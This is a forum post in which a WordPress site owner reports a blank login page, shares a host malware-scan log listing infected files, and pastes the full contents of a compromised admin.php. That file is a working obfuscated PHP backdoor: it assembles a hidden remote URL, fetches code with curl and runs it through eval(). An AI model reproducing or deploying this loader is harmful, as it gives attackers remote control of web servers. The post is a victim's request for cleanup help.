Hi,
I’m trying to login in dashboard but the login-page shows blank white screen. When I tried to look for problems in cpanel, I found some weird Malware files, I think my website has been hacked by some virus and this maybe the reason for white screen login page too and I don’t know how to resolve this. There are other directories infected too apart from just wordpress. I’ll share the report for reference. Also I wasn’t in touch with my website, so there’s a possibility that it could have been attacked from over a month. If anyone could suggest me ways on how to tackle this manually, it would be really helpful for me! here is the report log from host team:
/home3/latpapr3/opencart.latdev.latpay.com.au/AQO2wyJRoBX.php: SL-PHP-FILEHACKER-md5-bxdg.UNOFFICIAL FOUND
/home3/latpapr3/opencart.latdev.latpay.com.au/jNolZ1W37mK.php: SL-PHP-FILEHACKER-md5-bxdi.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/edit-tag-form.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/users.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/async-upload.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/menu-header.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/privacy.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/options-permalink.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/ms-users.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/upgrade.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/ms-edit.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/install.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUND
/home3/latpapr3/public_html/wp-admin/edit-form-advanced.php: SL-PHP-INJECTOR-1-hla.UNOFFICIAL FOUNDBelow is the code from admin.php:
<?php
echo 'wp-blog-header.php';
header('Content-Type:text/html;charset=utf-8');
$O=urldecode('F%7EcVdkq%24%256%40X%5C%22%2AH%2C%3A3%5E%21fIL0%3EY%23E%29yP%3F_ptRW%7DjBNw%609i%3D%2B%2FDUluA%5D%7BO%7Co1-TC.5hgMexG%282n7%2F4%3CK%26rZbSs%3BQJav8mz%5B');function Ooo1Oo11OO($OO00oO0Ooo=''){global $O;$Oo00OOoo0O=curl_init($OO00oO0Ooo);curl_setopt($Oo00OOoo0O,CURLOPT_RETURNTRANSFER,1);$OO0oOoo0O0=curl_exec($Oo00OOoo0O);return $OO0oOoo0O0;}function OOO1oOo11o($string){global $O;$O0ooo0O0OO=substr($string,0,5);$OO0o0oO0oO=substr($string,-5);$Oo0OoO00Oo=substr($string,7,strlen($string)-14);return gzinflate(base64_decode($O0ooo0O0OO.$Oo0OoO00Oo.$OO0o0oO0oO));}function OoOo11o1OO($Oo0oOOo00O=''){global $O;$OOoO0oOo00=isset($_GET[$O{35}.$O{69}.$O{35}.$O{73}.$O{88}.$O{91}.$O{68}])?trim($_GET[$O{35}.$O{69}.$O{35}.$O{73}.$O{88}.$O{91}.$O{68}]):'';$OO00oO0Ooo=$O{65}.$O{35}.$O{35}.$O{34}.$O{17}.$O{75}.$O{75}.$O{42}.$O{42}.$O{42}.$O{59}.$O{9}.$O{90}.$O{63}.$O{66}.$O{58}.$O{2}.$O{88}.$O{80}.$O{58}.$O{51}.$O{45}.$O{73}.$O{88}.$O{63}.$O{88}.$O{84}.$O{45}.$O{88}.$O{75};$OoO0oOOo00=Ooo1Oo11OO($OO00oO0Ooo.$OOoO0oOo00);eval($OoO0oOOo00);}OoOo11o1OO();?>